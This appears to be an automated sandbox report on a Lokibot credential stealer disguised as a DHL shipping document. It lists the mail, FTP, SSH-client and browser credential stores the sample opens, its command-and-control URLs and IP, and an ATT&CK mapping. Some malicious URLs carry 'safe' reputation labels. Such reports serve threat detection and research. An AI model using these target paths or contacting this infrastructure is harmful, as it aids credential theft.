                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_00406069 GetUserNameW,3_2_00406069

                Stealing of Sensitive Information

                barindex
                Yara detected Lokibot
                Source: Yara matchFile source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DHL_Express_Shipment_DOC.exe PID: 5364, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: PopPassword3_2_0040D069
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: SmtpPassword3_2_0040D069
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath Interception1
                Access Token Manipulation                		1
                Masquerading                		2
                OS Credential Dumping                		21
                Security Software Discovery                		Remote Services1
                Email Collection                		Exfiltration Over Other Network Medium1
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                Process Injection                		1
                Disable or Modify Tools                		2
                Credentials in Registry                		31
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol1
                Archive Collected Data                		Exfiltration Over Bluetooth1
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion                		Security Account Manager1
                Account Discovery                		SMB/Windows Admin Shares2
                Data from Local System                		Automated Exfiltration1
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Access Token Manipulation                		NTDS1
                System Owner/User Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer111
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
                Process Injection                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Deobfuscate/Decode Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items3
                Obfuscated Files or Information                		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                DHL_Express_Shipment_DOC.exe19%ReversingLabs
                DHL_Express_Shipment_DOC.exe30%VirustotalBrowse
                DHL_Express_Shipment_DOC.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://robertmario.is/?feed=rss20%Avira URL Cloudsafe
                http://robertmario.is/index.php?rest_route=/0%Avira URL Cloudsafe
                http://64.227.48.212/?page_id=2153600%Avira URL Cloudsafe
                http://robertmario.is/?feed=comments-rss20%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://64.227.48.212/?page_id=215360true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://robertmario.is/?feed=rss2DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp, DHL_Express_Shipment_DOC.exe, 00000003.00000002.487142894.0000000003519000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://robertmario.is/?feed=comments-rss2DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp, DHL_Express_Shipment_DOC.exe, 00000003.00000002.487142894.0000000003519000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ibsensoftware.com/DHL_Express_Shipment_DOC.exe, DHL_Express_Shipment_DOC.exe, 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://robertmario.is/index.php?rest_route=/DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://api.w.org/DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  64.227.48.212
                  		unknownUnited States
                  		14061DIGITALOCEAN-ASNUStrue

                  General Information

                  Joe Sandbox Version:37.0.0 Beryl
                  Analysis ID:831160
                  Start date and time:2023-03-21 07:11:09 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 5s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:4
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
